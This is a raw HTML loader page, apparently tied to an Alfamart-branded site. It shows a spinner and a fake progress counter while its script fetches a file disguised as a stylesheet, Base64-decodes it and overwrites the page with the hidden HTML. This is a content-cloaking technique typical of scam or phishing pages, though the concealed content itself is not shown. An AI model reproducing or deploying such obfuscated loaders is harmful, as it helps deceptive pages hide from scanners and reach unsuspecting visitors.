

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="maximum-scale=1.0, minimum-scale=1.0, user-scalable=0, initial-scale=1.0, width=device-width" />
    <meta name="referrer" content="always">
    <meta name="robots" content="noindex, follow">
    <title>...</title>
    <style>
        .l1727524053760 { position: relative; width: 2.5em; height: 2.5em; transform: rotate(165deg); }
        .l1727524053760:before, .l1727524053760:after { content: ""; position: absolute; top: 50%; left: 50%; display: block; width: 0.5em; height: 0.5em; border-radius: 0.25em; transform: translate(-50%, -50%); }
        .l1727524053760:before { animation: bl1727524053760 2s infinite; }
        .l1727524053760:after { animation: al1727524053760 2s infinite; }
        @keyframes bl1727524053760 {
            0% { width: 0.5em; box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); }
            35% { width: 2.5em; box-shadow: 0 -0.5em rgba(225, 20, 98, 0.75), 0 0.5em rgba(111, 202, 220, 0.75); }
            70% { width: 0.5em; box-shadow: -1em -0.5em rgba(225, 20, 98, 0.75), 1em 0.5em rgba(111, 202, 220, 0.75); }
            100% { box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); }
        }
        @keyframes al1727524053760 {
            0% { height: 0.5em; box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); }
            35% { height: 2.5em; box-shadow: 0.5em 0 rgba(61, 184, 143, 0.75), -0.5em 0 rgba(233, 169, 32, 0.75); }
            70% { height: 0.5em; box-shadow:0.5em -1em rgba(61, 184, 143, 0.75), -0.5em 1em rgba(233, 169, 32, 0.75); }
            100% { box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); }
        }
        /**
         * Attempt to center the whole thing!
         */
        html, body { height: 100%; }
        .l1727524053760 { position: absolute; top: calc(50% - 1.25em); left: calc(50% - 1.25em); }
        .p1727524053760 { width: 3em; height: 1em; font-size: x-small; text-align:center; position: absolute; top: calc(50% + 2.5em); left: calc(50% - 1.5em); }
    </style>
</head>
<body translate="no" >
<div class="l1727524053760"></div>
<div class="p1727524053760"></div>
<script>
    function sc1727524053760(name,value){
        name = "t6.alfamart" + name;
        var Days = 30;
        var exp = new Date();
        exp.setTime(exp.getTime() + (Days*20*1000));
        document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
    }
    function gc1727524053760(name){
        name = "t6.alfamart" + name;
        var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
        if(arr=document.cookie.match(reg)){
            return unescape(arr[2]);
        }
        return '';
    }
    (function() {
        var p1727524053760 = document.documentElement.querySelector(".p1727524053760");
        window.loaded1727524053760 = false;
        var lod1727524053760 = !!gc1727524053760("lod");
        function g1727524053760(e, v) {
            if (!window.loaded1727524053760) {
                e.innerText = v + "%";
                if (v < 90) {
                    setTimeout(g1727524053760, 30, e, v+1);
                } else if(v < 99) {
                    setTimeout(g1727524053760, 1000, e, v+1);
                } else {
                    location.reload();
                }
            }

        }
        if (!lod1727524053760) {
            g1727524053760(p1727524053760, 1);
        }
    })();
</script>

<div style="display:none">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/4.6.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.0/css/select2.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
<link rel="stylesheet" href="/res/82672551/css/style.css?_=ac">
</div>
<script src="/res/js/app/base64.min.js"></script>
<script>(function() {function f1727524053760(url, callback) { var re1727524053760 = new XMLHttpRequest(); re1727524053760.open('get', url, true); re1727524053760.send(); re1727524053760.onreadystatechange = function () { if (re1727524053760.readyState === 4 && re1727524053760.status === 200) { callback(re1727524053760.response); } };}f1727524053760("/vae-id-id-gs-2.css", function(respsc1727524053760) { sc1727524053760("lod", 1); var content = Base64.decode(respsc1727524053760); window.loaded1727524053760 = true; var dd1727524053760 = document.open("text/html", "replace"); dd1727524053760.write(content); dd1727524053760.close();});})();</script>
</body>
</html>
